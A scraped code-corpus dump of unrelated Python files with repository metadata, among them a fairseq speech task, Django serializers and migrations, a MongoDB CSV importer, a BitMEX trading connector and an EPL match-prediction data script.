def load_dataset(self, split, epoch=1, combine=False, **kwargs):
is_train_split = split.startswith("train")
pre_tokenizer = self.build_tokenizer(self.args)
bpe_tokenizer = self.build_bpe(self.args)
self.datasets[split] = SpeechToTextDatasetCreator.from_tsv(
self.args.data,
self.data_cfg,
split,
self.tgt_dict,
pre_tokenizer,
bpe_tokenizer,
is_train_split=is_train_split,
epoch=epoch,
seed=self.args.seed,
)
@property
def target_dictionary(self):
return self.tgt_dict
@property
def source_dictionary(self):
return None
def max_positions(self):
return self.args.max_source_positions, self.args.max_target_positions
def build_model(self, args):
args.input_feat_per_channel = self.data_cfg.input_feat_per_channel
args.input_channels = self.data_cfg.input_channels
return super(SpeechToTextTask, self).build_model(args)
def build_generator(
self,
models,
args,
seq_gen_cls=None,
extra_gen_cls_kwargs=None,
):
if self.data_cfg.prepend_tgt_lang_tag and args.prefix_size != 1:
raise ValueError(
'Please set "--prefix-size 1" since '
"target language ID token is prepended as BOS."
)
lang_token_ids = {
i
for s, i in self.tgt_dict.indices.items()
if SpeechToTextDataset.is_lang_tag(s)
}
extra_gen_cls_kwargs = {"symbols_to_strip_from_output": lang_token_ids}
return super().build_generator(
models, args, seq_gen_cls=None, extra_gen_cls_kwargs=extra_gen_cls_kwargs
)
def build_tokenizer(self, args):
logger.info(f"pre-tokenizer: {self.data_cfg.pre_tokenizer}")
return encoders.build_tokenizer(Namespace(**self.data_cfg.pre_tokenizer))
def build_bpe(self, args):
logger.info(f"tokenizer: {self.data_cfg.bpe_tokenizer}")
return encoders.build_bpe(Namespace(**self.data_cfg.bpe_tokenizer))
@classmethod
def build_dataset_for_inference(cls, audio_paths, n_frames):
return SpeechToTextDataset("interactive", False, {}, audio_paths, n_frames)
| [
"[email protected]"
]
| |
43c06f8278a5366020f9d1faef6d11fbe0df03ae | 82ebc6142f7044f8e908ffd6b2dc9e699191fd36 | /users/serializers.py | a7c000728c4688b5ce63c1f4c258ca68ee3a3d0d | []
| no_license | 32dantey/shopbuild | 4f775209e5b320364a8a845583c0d3c77f9844ee | 745b6cf73c8da52ed93b8bfe49055624dfa0aea2 | refs/heads/master | 2023-08-25T17:29:23.470994 | 2021-11-14T14:17:05 | 2021-11-14T14:17:05 | 427,917,564 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | from django.contrib.auth.models import User
from rest_framework import serializers
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ['username', 'email', 'is_staff']
| [
"[email protected]"
]
| |
815579dd6d44ae403fc012a4f99d9bb8a607d842 | 4aec44fe50fa5c40f80c45bfb160d2fa7a98a0a9 | /students/jsward/lesson07/assignment/linear.py | f11fc105aa5a6d00df68e15542e76269dc162e4d | []
| no_license | UWPCE-PythonCert-ClassRepos/220-Advanced-Summer-2019 | 4e51fde79921e6e75f590bef223bc1b0f118ef41 | 6ffd7b4ab8346076d3b6cc02ca1ebca3bf028697 | refs/heads/master | 2022-12-13T01:22:01.063023 | 2019-09-22T10:21:37 | 2019-09-22T10:21:37 | 194,944,978 | 4 | 18 | null | 2022-12-08T01:22:40 | 2019-07-02T22:51:07 | HTML | UTF-8 | Python | false | false | 3,005 | py | # They are not, in fact, constants...
# pylint: disable=C0103
# pylint: disable=W0703
"""
Lesson 7: Linear
Relational concept Mongo DB equivalent
Database Database
Tables Collections
Rows Documents
Index Index
"""
import cProfile
import csv
import datetime
import logging
import sys
import time
from pymongo import MongoClient
from pymongo import errors as pymongo_errors
log_format = "%(asctime)s\t%(message)s"
formatter = logging.Formatter(log_format)
file_handler = logging.FileHandler("mongo_{}.log".format(datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")))
file_handler.setFormatter(formatter)
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setFormatter(formatter)
logger = logging.getLogger(__name__)
logger.setLevel('INFO')
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
mongo_client = MongoClient("mongodb://localhost:27017")
assignment_db = mongo_client["assignment"]
def import_data(data_dir, *files):
""" Imports data from file(s) to mongodb"""
list_of_tuples = []
for file_path in files:
processed = 0
collection_name = file_path.split(".")[0]
try:
count_prior = sum(1 for _ in assignment_db[collection_name].find())
except Exception:
logger.info("No existing records found in collection %s", collection_name)
count_prior = 0
with open("/".join([data_dir, file_path])) as file:
reader = csv.reader(file, delimiter=",")
header = False
start_time = time.time()
for row in reader:
if not header:
header = [h.strip("\ufeff") for h in row]
else:
data = {header[i]: v for i, v in enumerate(row)}
try:
assignment_db[collection_name].insert_one(data)
processed += 1
logger.debug("Inserted record %s into collection %s", data, collection_name)
except pymongo_errors.ServerSelectionTimeoutError as ex:
logger.error("Timeout or connection refused when connecting to MongoDB: %s", ex)
break
except Exception as ex:
logger.error("Error inserting record %s into table %s in MongoDB %s Error: %s",
data, assignment_db.name, mongo_client, ex)
continue
end_time = time.time()
list_of_tuples.append(tuple([processed, count_prior, (count_prior + processed), (end_time - start_time)]))
logger.info("Inserted %s records into collection %s in %s", processed, collection_name, (end_time - start_time))
logger.info("Collection now contains %s records", (count_prior + processed))
return list_of_tuples
if __name__ == "__main__":
import_data('data', 'customers.csv', 'products.csv')
# print(results)
| [
"[email protected]"
]
| |
fe721a5d634410d1e7eae1f657adedf3d2a421f4 | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/tensorflow/python/keras/preprocessing/image.py | f2a6b9eb3dcc6002673a3e3a13516299983498ad | []
| no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:dd9edf94ef6b932c96aa6c9f40e3c19503ccfed4c5a10d0871bd11259eafd357
size 21747
| [
"github@cuba12345"
]
| github@cuba12345 |
bc99ce65235a3ffa79223116c532a78ee3ef3d86 | 4273f162abb12ef1939271c2aabee9547ac6afee | /studio_usd_pipe/resource/push/maya/uv/extractor_thumbnail.py | 8f6da8661609560730437f9504ee9bfc291638a7 | []
| no_license | xiyuhao/subins_tutorials | 2717c47aac0adde099432e5dfd231606bf45a266 | acbe4fe16483397e9b0f8e240ca23bdca652b92d | refs/heads/master | 2023-07-28T13:42:41.445399 | 2021-09-12T11:02:37 | 2021-09-12T11:02:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 876 | py | NAME = 'Extract UV Thumbnail'
ORDER = 1
VALID = True
TYPE = 'extractor'
KEY = 'uv_thumbnail'
OWNER = 'Subin Gopi'
COMMENTS = 'To create uv thumbnail file'
VERSION = '0.0.0'
MODIFIED = 'April 19, 2020'
def execute(output_path=None, **kwargs):
import os
from studio_usd_pipe.core import common
from studio_usd_pipe.utils import maya_asset
if not os.path.isfile(kwargs['thumbnail']):
return False, [kwargs['thumbnail']], 'not found input thumbnail!...'
ouput_image_path = os.path.join(
output_path,
'{}.png'.format(kwargs['caption'])
)
premission = common.data_exists(ouput_image_path, True)
if not premission:
return False, [ouput_image_path], 'not able to save thumbnail!...'
thumbnail = maya_asset.create_thumbnail(kwargs['thumbnail'], ouput_image_path)
return True, [thumbnail], 'success!...'
| [
"[email protected]"
]
| |
fa350fdb3e72dd4791fd8ec26ddfb37adacabbf3 | c84a3895e6fdcaff5a9f97abe9c3efbecbad535f | /trader/connector/bitmex/trader.py | 8a25600d285d7b0035c8a73b3cceaf9e557e151c | [
"LicenseRef-scancode-warranty-disclaimer"
]
| no_license | cal97g/siis | 5a171eb34dd3f7ae6e19d8065ff1e2f8b6251319 | adc06e48e5df6ffd7bed6ee6b79d0aa3cfe80e0d | refs/heads/master | 2020-07-23T18:11:57.267225 | 2019-09-05T01:00:37 | 2019-09-05T01:00:37 | 207,663,001 | 0 | 1 | null | 2019-09-10T21:05:25 | 2019-09-10T21:05:25 | null | UTF-8 | Python | false | false | 22,885 | py | # @date 2018-08-21
# @author Frederic SCHERMA
# @license Copyright (c) 2018 Dream Overflow
# Trader/autotrader connector for bitmex.com
import time
import base64
import uuid
import copy
import requests
from datetime import datetime
from notifier.notifiable import Notifiable
from notifier.signal import Signal
from trader.trader import Trader
from trader.market import Market
from .account import BitMexAccount
from trader.position import Position
from trader.order import Order
from connector.bitmex.connector import Connector
from config import config
import logging
logger = logging.getLogger('siis.trader.bitmex')
class BitMexTrader(Trader):
"""
BitMex real or testnet trader based on the BitMexWatcher.
@todo verify than on_order_updated is working without the temporary fixture now it has signal from watchers
"""
REST_OR_WS = False # True if REST API sync else do with the state returned by WS events
def __init__(self, service):
super().__init__("bitmex.com", service)
self._watcher = None
self._account = BitMexAccount(self)
self._last_position_update = 0
self._last_order_update = 0
def connect(self):
super().connect()
# retrieve the ig.com watcher and take its connector
self.lock()
self._watcher = self.service.watcher_service.watcher(self._name)
if self._watcher:
self.service.watcher_service.add_listener(self)
self.unlock()
if self._watcher and self._watcher.connected:
self.on_watcher_connected(self._watcher.name)
def disconnect(self):
super().disconnect()
self.lock()
if self._watcher:
self.service.watcher_service.remove_listener(self)
self._watcher = None
self.unlock()
def on_watcher_connected(self, watcher_name):
super().on_watcher_connected(watcher_name)
# markets, orders and positions
self.lock()
# fetch tradable markets
if '*' in self.configured_symbols():
# all symbols from the watcher
symbols = self._watcher.instruments
else:
# only configured symbols
symbols = self.configured_symbols()
for symbol in symbols:
self.market(symbol, True)
self.__fetch_orders()
self.__fetch_positions()
self.unlock()
# initial account update
self.account.update(self._watcher.connector)
def on_watcher_disconnected(self, watcher_name):
super().on_watcher_disconnected(watcher_name)
def market(self, market_id, force=False):
"""
Fetch from the watcher and cache it. It rarely changes so assume it once per connection.
@param force Force to update the cache
"""
market = self._markets.get(market_id)
if (market is None or force) and self._watcher is not None:
try:
market = self._watcher.fetch_market(market_id)
self._markets[market_id] = market
except Exception as e:
logger.error("fetch_market: %s" % repr(e))
return None
return market
@property
def authenticated(self):
return self.connected and self._watcher.connector.authenticated
@property
def connected(self):
return self._watcher is not None and self._watcher.connector is not None and self._watcher.connector.connected
def pre_update(self):
super().pre_update()
if self._watcher is None:
self.connect()
elif self._watcher.connector is None or not self._watcher.connector.connected:
# wait for the watcher be connected
retry = 0
while self._watcher.connector is None or not self._watcher.connector.connected:
retry += 1
if retry >= int(5 / 0.01):
self._watcher.connect()
# and wait 0.5 second to be connected
time.sleep(0.5)
# don't waste the CPU
time.sleep(0.01)
def update(self):
"""
Here we use the WS API so its only a simple sync we process here.
"""
if not super().update():
return False
if self._watcher is None or not self._watcher.connected:
return True
if BitMexTrader.REST_OR_WS:
# account data update
try:
self.lock()
self.__fetch_account()
except Exception as e:
import traceback
logger.error(traceback.format_exc())
finally:
self.unlock()
# positions
try:
self.lock()
self.__fetch_positions()
now = time.time()
self._last_update = now
except Exception as e:
import traceback
logger.error(traceback.format_exc())
finally:
self.unlock()
# orders
try:
self.lock()
self.__fetch_orders()
now = time.time()
self._last_update = now
except Exception as e:
import traceback
logger.error(traceback.format_exc())
finally:
self.unlock()
return True
def post_update(self):
super().post_update()
# don't wast the CPU 5 ms loop
time.sleep(0.005)
@Trader.mutexed
def create_order(self, order):
if not self.has_market(order.symbol):
logger.error("%s does not support market %s in order %s !" % (self.name, order.symbol, order.order_id))
return
if not self._activity:
return False
postdict = {
'symbol': order.symbol,
'clOrdID': order.ref_order_id,
}
qty = order.quantity
# short means negative quantity
if order.direction == Position.SHORT:
qty = -qty
exec_inst = []
# order type
# @todo Order.ORDER_STOP_LIMIT
if order.order_type == Order.ORDER_MARKET:
postdict['ordType'] = 'Market'
postdict['orderQty'] = qty
elif order.order_type == Order.ORDER_LIMIT:
postdict['ordType'] = 'Limit'
postdict['orderQty'] = qty
postdict['price'] = order.price
# only possible with limit order
if order.post_only:
exec_inst.append("ParticipateDoNotInitiate")
elif order.order_type == Order.ORDER_STOP:
postdict['ordType'] = 'Stop'
postdict['orderQty'] = qty
postdict['stopPx'] = order.stop_price
elif order.order_type == Order.ORDER_STOP_LIMIT:
postdict['ordType'] = 'StopLimit'
postdict['orderQty'] = qty
postdict['price'] = order.price
postdict['stopPx'] = order.stop_price
elif order.order_type == Order.ORDER_TAKE_PROFIT:
postdict['ordType'] = 'MarketIfTouched'
postdict['orderQty'] = qty
postdict['stopPx'] = order.stop_price
elif order.order_type == Order.ORDER_TAKE_PROFIT_LIMIT:
postdict['ordType'] = 'LimitIfTouched'
postdict['orderQty'] = qty
postdict['price'] = order.price
postdict['stopPx'] = order.stop_price
else:
postdict['ordType'] = 'Market'
postdict['orderQty'] = qty
# execution price
if order.price_type == Order.PRICE_LAST:
exec_inst.append('LastPrice')
elif order.price_type == Order.PRICE_INDEX:
exec_inst.append('IndexPrice')
elif order.price_type == Order.PRICE_MARK:
exec_inst.append('MarkPrice')
if order.reduce_only:
exec_inst.append("ReduceOnly")
# exec_inst.append("Close") # distinct for reduce only but close imply reduceOnly
# close implies a qty or a side
if exec_inst:
postdict['execInst'] = ','.join(exec_inst)
logger.info("Trader %s order %s %s @%s %s" % (self.name, order.direction_to_str(), order.symbol, order.price, order.quantity))
try:
result = self._watcher.connector.request(path="order", postdict=postdict, verb='POST', max_retries=15)
except Exception as e:
logger.error(str(e))
return False
if result and result.get('ordRejReason'):
logger.error("%s rejected order %s from %s %s - cause : %s !" % (
self.name, order.direction_to_str(), order.quantity, order.symbol, result['ordRejReason']))
return False
# store the order with its order id
order.set_order_id(result['orderID'])
order.created_time = self._parse_datetime(result.get('timestamp')).timestamp()
order.transact_time = self._parse_datetime(result.get('transactTime')).timestamp()
self._orders[order.order_id] = order
return True
@Trader.mutexed
def cancel_order(self, order_or_id):
# DELETE endpoint=order
if type(order_or_id) is str:
order = self._orders.get(order_or_id)
else:
order = order_or_id
if not self._activity:
return False
if order is None:
return False
order_id = order.order_id if order else order_or_id
symbol = order.symbol or ""
postdict = {
'orderID': order_id,
}
try:
result = self._watcher.connector.request(path="order", postdict=postdict, verb='DELETE', max_retries=15)
except requests.exceptions.HTTPError as e:
if e.response.status_code == 404:
# no longer exist, accepts as ok
return True
else:
logger.error(str(e))
return False
except Exception as e:
logger.error(str(e))
return False
# if result and result.get('ordRejReason'):
# logger.error("%s rejected cancel order %s from %s - cause : %s !" % (
# self.name, order_id, symbol, result['ordRejReason']))
# return False
return True
@Trader.mutexed
def close_position(self, position_id, market=True, limit_price=None):
if not self._activity:
return False
position = self._positions.get(position_id)
if position is None or not position.is_opened():
return False
if not self.has_market(position.symbol):
logger.error("%s does not support market %s on close position %s !" % (
self.name, position.symbol, position.position_id))
return False
ref_order_id = "siis_" + base64.b64encode(uuid.uuid4().bytes).decode('utf8').rstrip('=\n')
# keep for might be useless in this case
order.set_ref_order_id(ref_order_id)
order = Order(self, position.symbol)
order.set_position_id(position.position_id)
order.quantity = position.quantity
order.direction = -position.direction # neg direction
postdict = {
'symbol': order.symbol,
'clOrdID': ref_order_id,
'execInst': 'Close',
# 'execInst': 'ReduceOnly,Close' # @todo why rejected with ReduceOnly ?
}
# short mean negative quantity
if order.direction == Position.SHORT:
qty = -qty
# fully close (using Close and need 'side' when qty is not defined)
# qty = None
# order type
if market:
order.order_type = Order.ORDER_MARKET
postdict['ordType'] = "Market"
postdict['orderQty'] = qty
else:
order.order_type = Order.ORDER_LIMIT
order.price = limit_price
postdict['ordType'] = "Limit"
postdict['price'] = order.price
postdict['orderQty'] = qty
if qty is None:
postdict['side'] = "Buy" if order.direction > 0 else "Sell"
try:
result = self._watcher.connector.request(path="order", postdict=postdict, verb='POST', max_retries=15)
except Exception as e:
logger.error(str(e))
return False
if result and result.get('ordRejReason'):
logger.error("%s rejected closing order %s from %s %s - cause : %s !" % (
self.name, order.direction_to_str(), order.quantity, order.symbol, result['ordRejReason']))
return False
# store the order with its order id
order.set_order_id(result['orderID'])
# and store the order
self._orders[order.order_id] = order
# set position closing until we get confirmation on a next update
position.closing(limit_price)
return True
@Trader.mutexed
def modify_position(self, position_id, stop_loss_price=None, take_profit_price=None):
"""Not supported"""
return False
def positions(self, market_id):
self.lock()
position = self._positions.get(market_id)
if position:
positions = [copy.copy(position)]
else:
positions = []
self.unlock()
return positions
#
# slots
#
@Trader.mutexed
def on_order_updated(self, market_id, order_data, ref_order_id):
market = self._markets.get(order_data['symbol'])
if market is None:
# not interested by this market
return
try:
# @todo temporary substitution
self.__update_orders()
except Exception as e:
logger.error(repr(e))
#
# private
#
def _parse_datetime(self, date_str):
return datetime.strptime(date_str or '1970-01-01 00:00:00.000Z', "%Y-%m-%dT%H:%M:%S.%fZ") # .%fZ")
#
# protected
#
def __fetch_account(self):
# @todo use REST API to fetch account state
self._account.update(self._watcher.connector)
def __fetch_positions(self):
# @todo use REST API to fetch open positions
for symbol, market in self._markets.items():
return self.__update_positions(symbol, market)
def __fetch_orders(self):
# @todo use REST API to fetch open orders
return self.__update_orders()
def __update_positions(self, symbol, market):
if not self.connected:
return
# position for each configured market
for symbol, market in self._markets.items():
pos = self._watcher.connector.ws.position(symbol)
position = None
if self._positions.get(symbol):
position = self._positions.get(symbol)
elif pos['isOpen']:
# insert the new position
position = Position(self)
position.set_position_id(symbol)
position.set_key(self.service.gen_key())
quantity = abs(float(pos['currentQty']))
direction = Position.SHORT if pos['currentQty'] < 0 else Position.LONG
position.entry(direction, symbol, quantity)
position.leverage = pos['leverage']
position.entry_price = pos['avgEntryPrice']
position.created_time = datetime.strptime(pos['openingTimestamp'], "%Y-%m-%dT%H:%M:%S.%fZ").timestamp() # .%fZ")
# id is symbol
self._positions[symbol] = position
elif (not pos['isOpen'] or pos['currentQty'] == 0) and self._positions.get(symbol):
# no more position
del self._positions[symbol]
if position:
# absolute value because we work with positive quantity + direction information
position.quantity = abs(float(pos['currentQty']))
position.direction = Position.SHORT if pos['currentQty'] < 0 else Position.LONG
position.leverage = pos['leverage']
# position.market_close = pos['market_close']
position.entry_price = pos['avgEntryPrice']
position.created_time = datetime.strptime(pos['openingTimestamp'], "%Y-%m-%dT%H:%M:%S.%fZ").timestamp() # .%fZ")
# XBt to XBT
# ratio = 1.0
# if pos['currency'] == 'XBt':
# ratio = 1.0 / 100000000.0
# don't want them because they are in XBt or XBT
# position.profit_loss = (float(pos['unrealisedPnl']) * ratio)
# position.profit_loss_rate = float(pos['unrealisedPnlPcnt'])
# # must be updated using the market taker fee
# position.profit_loss_market = (float(pos['unrealisedPnl']) * ratio)
# position.profit_loss_market_rate = float(pos['unrealisedPnlPcnt'])
# compute profit loss in base currency
# @todo disabled for now util fix contract_size and value_per_pip calculation
# position.update_profit_loss(market)
def __update_orders(self):
if not self.connected:
return
# filters only siis managed orders
src_orders = self._watcher.connector.ws.open_orders("") # "siis_")
# first delete older orders
order_rm_list = []
for k, order in self._orders.items():
found = False
for src_order in src_orders:
src_order_id = src_order['clOrdID'] or src_order['orderID']
if order.order_id == src_order['clOrdID'] or order.order_id == src_order['orderID']:
found = True
break
if not found:
order_rm_list.append(order.order_id)
for order_id in order_rm_list:
del self._orders[order_id]
# insert or update active orders
for src_order in src_orders:
found = False
src_order_id = src_order['clOrdID'] or src_order['orderID']
order = self._orders.get(src_order_id)
if order is None:
# insert
order = Order(self, src_order['symbol'])
order.set_order_id(src_order_id)
self._orders[order.order_id] = order
else:
order = self._orders.get(src_order_id)
# logger.info(src_order)
# probably modifier or when leavesQty is update the ordStatus must change
# if src_order['ordStatus'] != "New":
# continue
# update
order.direction = Position.LONG if src_order['side'] == 'Buy' else Position.SHORT
# 'orderQty' (ordered qty), 'cumQty' (cumulative done), 'leavesQty' (remaning)
order.quantity = src_order.get('leavesQty', src_order.get('orderQty', 0))
if src_order.get('transactTime'):
order.transact_time = self._parse_datetime(src_order.get('transactTime')).timestamp()
if src_order['ordType'] == "Market":
order.order_type = Order.ORDER_MARKET
elif src_order['ordType'] == "Limit":
order.order_type = Order.ORDER_LIMIT
order.price = src_order.get('price')
elif src_order['ordType'] == "Stop":
order.order_type = Order.ORDER_STOP
order.stop_price = src_order.get('stopPx')
elif src_order['ordType'] == "StopLimit":
order.order_type = Order.ORDER_STOP_LIMIT
order.price = src_order.get('price')
order.stop_price = src_order.get('stopPx')
elif src_order['ordType'] == "MarketIfTouched":
order.order_type = Order.ORDER_TAKE_PROFIT
order.stop_price = src_order.get('stopPx')
elif src_order['ordType'] == "LimitIfTouched":
order.order_type = Order.ORDER_TAKE_PROFIT_LIMIT
order.price = src_order.get('price')
order.stop_price = src_order.get('stopPx')
if src_order['timeInForce'] == 'GoodTillCancel':
order.time_in_force = Order.TIME_IN_FORCE_GTC
elif src_order['timeInForce'] == 'ImmediateOrCancel':
order.time_in_force = Order.TIME_IN_FORCE_IOC
elif src_order['timeInForce'] == 'FillOrKill':
order.time_in_force = Order.TIME_IN_FORCE_FOK
else:
order.time_in_force = Order.TIME_IN_FORCE_GTC
# triggered, ordRejReason, currency
# @todo
# execution options
exec_inst = src_order['execInst'].split(',')
# taker or maker fee
if 'ParticipateDoNotInitiate' in exec_inst:
order.post_only = True
else:
order.post_only = False
# close reduce only
if 'Close' in exec_inst:
# close only order (must be used with reduce only, only reduce a position, and close opposites orders)
order.close_only = True
else:
order.close_only = False
# close reduce only
if 'ReduceOnly' in exec_inst:
# reduce only order (only reduce a position)
order.reduce_only = True
else:
order.redeuce_only = False
# execution price
if 'LastPrice' in exec_inst:
order.price_type = Order.PRICE_LAST
elif 'IndexPrice' in exec_inst:
order.price_type = Order.PRICE_MARK
elif 'MarkPrice' in exec_inst:
order.price_type = Order.PRICE_INDEX
# {'orderID': 'f1b0e6b1-3459-9fc8-d948-911d5032a521', 'clOrdID': '', 'clOrdLinkID': '', 'account': 513190, 'symbol': 'XBTUSD', 'side': 'Buy', 'simpleOrderQty': None,
# 'orderQty': 500, 'price': 7092.5, 'displayQty': None, 'stopPx': None, 'pegOffsetValue': None, 'pegPriceType': '', 'currency': 'USD', 'settlCurrency': 'XBt',
# 'ordType': 'Limit', 'timeInForce': 'GoodTillCancel', 'execInst': 'ParticipateDoNotInitiate', 'contingencyType': '', 'exDestination': 'XBME', 'ordStatus': 'New',
# 'triggered': '', 'workingIndicator': True, 'ordRejReason': '', 'simpleLeavesQty': 0.0705, 'leavesQty': 500, 'simpleCumQty': 0, 'cumQty': 0, 'avgPx': None,
# 'multiLegReportingType': 'SingleSecurity', 'text': 'Amended price: Amend from www.bitmex.com\nSubmission from www.bitmex.com', 'transactTime': '2018-09-01T21:09:09.688Z',
# 'timestamp': '2018-09-01T21:09:09.688Z'}
| [
"[email protected]"
]
| |
967dc456ae8754460e5768a8eb7b68d269bb5fd9 | d4bbbb07826fd11d071624761c3a452e431cec8f | /models/process_data.py | 398631223021b2ea0a47c8b791f81c6922aaaaa5 | [
"MIT"
]
| permissive | planetnest/epl-prediction | ecb88fb1b9fbea8d93637a547fb559b004f29bb7 | ffd4eb626d18829df49e07663ef74cd3735ca9d3 | refs/heads/master | 2021-07-06T19:07:14.132246 | 2017-09-27T23:45:15 | 2017-09-27T23:45:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,335 | py | import os.path
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from .preprocess import process_data
DATASET_DIR = '../datasets/'
DATA_FILES = ['epl-2015-2016.csv', 'epl-2016-2017.csv', 'epl-2017-2018.csv']
CURR_SEASON_DATA = os.path.join(DATASET_DIR, DATA_FILES[-1])
USELESS_ROWS = ['Referee', 'Div', 'Date', 'HomeTeam', 'AwayTeam']
def load_data():
dataset = pd.read_csv(CURR_SEASON_DATA)
dataset.drop(USELESS_ROWS, axis=1, inplace=True)
for d_file in DATA_FILES[:-1]:
d_file = os.path.join(DATASET_DIR, d_file)
data = pd.read_csv(d_file)
data.drop(USELESS_ROWS, axis=1, inplace=True)
dataset = pd.concat([dataset, data])
return dataset
def get_remaining_features(home, away):
df = pd.read_csv(CURR_SEASON_DATA)
# Home team and Away team
home_team = df['HomeTeam'].values
away_team = df['AwayTeam'].values
# Get the indexes for home and away team
home_idx = get_index(home_team.tolist(), home)
away_idx = get_index(away_team.tolist(), away)
# Drop string columns
df.drop(['Div', 'Date', 'HomeTeam', 'AwayTeam', 'FTR', 'HTR', 'Referee'], axis=1, inplace=True)
# Get rows where the home and away team shows up respectively
home_data = df.values[home_idx]
away_data = df.values[away_idx]
return np.average(home_data, axis=0), np.average(away_data, axis=0)
def get_index(teams, value):
value = value.title()
indexes = [i for i, team in enumerate(teams) if team == value]
return indexes
def preprocess_features(X):
# init new output dataframe
"""
Cleans up any non-numeric data.
:param X:
Features to be cleaned.
:return: output `pd.DataFrame`
A new pandas DataFrame object with clean numeric values.
"""
output = pd.DataFrame(index=X.index)
# investigate each feature col for data
for col, col_data in X.iteritems():
# if data is categorical, convert to dummy variables
if col_data.dtype == object:
print('obj lets get dummies')
col_data = pd.get_dummies(col_data, prefix=col)
# collect the converted cols
output = output.join(col_data)
return output
def process(filename=None, test_size=None, train_size=None):
"""
Process data into training and testing set.
:param filename: str or None (default is None)
The path to the `csv` file which contains the dataset. If
set to None, it will load all the datasets.
:param test_size: float, int, or None (default is None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the test split. If
int, represents the absolute number of test samples. If None,
the value is automatically set to the complement of the train size.
If train size is also None, test size is set to 0.25.
:param train_size: float, int, or None (default is None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the train split. If
int, represents the absolute number of train samples. If None,
the value is automatically set to the complement of the test size.
:return: X_train, X_test, y_train, y_test
`np.ndarray` o
"""
if filename:
data = pd.read_csv(filename)
else:
data = load_data()
print(data.columns.values)
# FTR = full time result
X_all = data.drop(['FTR'], axis=1)
y_all = data['FTR']
X_all = process_data(X_all)
# Split into training and testing data
X_train, X_test, y_train, y_test = train_test_split(X_all, y_all,
test_size=test_size, train_size=train_size,
random_state=42, stratify=y_all)
return np.array(X_train), np.array(X_test), np.array(y_train), np.array(y_test)
if __name__ == '__main__':
# home_data, away_data = get_remaining_features(home='arsenal', away='chelsea')
# print(home_data, '\n')
# print(away_data)
# data = load_data()
# print(data.tail(3))
X_train, X_test, y_train, y_test = process(filename=None)
print(X_train.shape, y_train.shape)
print(X_test.shape, y_test.shape)
| [
"[email protected]"
]
| |
b68be730fe886ebea5a66fb439c78439510f4794 | e7a46c0f63e7595a533ab58a7db07b1c12ef6092 | /begpyprog/integr.py | 6504b69f2a91ac9fcea08095da70da492eb0ce9f | []
| no_license | sockduct/Books | 263ab81b72e39a11acc83b698c76b41104d8bd20 | 954039ff4abf51bbfec05944e5175cefe232a68f | refs/heads/master | 2021-01-10T03:37:47.340931 | 2016-10-29T12:34:58 | 2016-10-29T12:34:58 | 55,922,532 | 0 | 1 | null | 2016-10-29T12:34:59 | 2016-04-10T21:06:00 | HTML | UTF-8 | Python | false | false | 970 | py | ####################################################################################################
'''
Simple program to convert a string of integers separated by commas into an integer list
'''
# Imports
import sys
from BadInput import BadInput
__version__ = '0.0.1'
def parse(input):
curlst = input.replace(' ', '')
curlst = curlst.split(',')
try:
newlst = [int(i) for i in curlst]
except ValueError as e:
raise BadInput(curlst)
#except ValueError as e:
# newlst = None
# print 'Skipping invalid input - {}'.format(str(curlst))
#except Exception as e:
# print 'Unhandled except - {}, aborting...'.format(str(e))
# sys.exit(-2)
return newlst
if __name__ == '__main__':
if len(sys.argv) < 2:
print 'Usage: {} <string of integers separated by commas> [<str2> ...]'.format(
sys.argv[0])
sys.exit(-1)
for elmt in sys.argv[1:]:
print parse(elmt)
| [
"[email protected]"
]
| |
94dbeb2675acafae474f9db4dcc4d4115a25d94f | ecae7275fd43ec93ca5771083e05ae864685faf9 | /list/list_multiplication.py | e7375b7967c1e5ea8c97cb6557e6b9a2c5eae460 | []
| no_license | shamoldas/pythonBasic | 104ca8d50099c2f511802db1f161f6d050f879cc | 3a7252a15f6d829f55700ec2ff7f7d153f3ec663 | refs/heads/main | 2023-01-09T06:38:55.357476 | 2020-11-11T12:27:31 | 2020-11-11T12:27:31 | 311,960,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | import numpy as np
a = [1,2,3,4]
b = [2,3,4,5]
d=a*b
print(d)
c=np.multiply(a,b)
print(c)
| [
"[email protected]"
]
| |
8bf6f30a0b6898775a955c99c1135e2fb41fbb1c | 9f46d82b1bbb561d663fbdbaa14331b9193fb18d | /buses/migrations/0002_auto_20200903_0438.py | eba7853d4e57eefbd553a172fc37a6f95240605f | []
| no_license | ziaurjoy/simple-class-based | 32012b56bb727ca5891d3938b024cdda4c4f30c8 | 9fd881d83e2e573c7974caeefc89bb7b03a78a05 | refs/heads/master | 2022-12-07T23:50:03.114676 | 2020-09-07T14:11:06 | 2020-09-07T14:11:06 | 293,546,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | # Generated by Django 3.1 on 2020-09-03 04:38
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('buses', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bussescompany',
options={'verbose_name_plural': 'bus companis'},
),
migrations.CreateModel(
name='Bus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('serial_number', models.CharField(db_index=True, max_length=15)),
('operator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='buses.bussescompany')),
],
),
]
| [
"[email protected]"
]
| |
e411a3f2ff7be97ff72496885a1285324ae4b0cd | b40d1a26ea04a19ec0da7bf55db84b7ee36cc898 | /leetcode.com/python/895_Maximum_Frequency_Stack.py | b083d8b11400faa43d9540631aac9d70eb9f35a3 | [
"MIT"
]
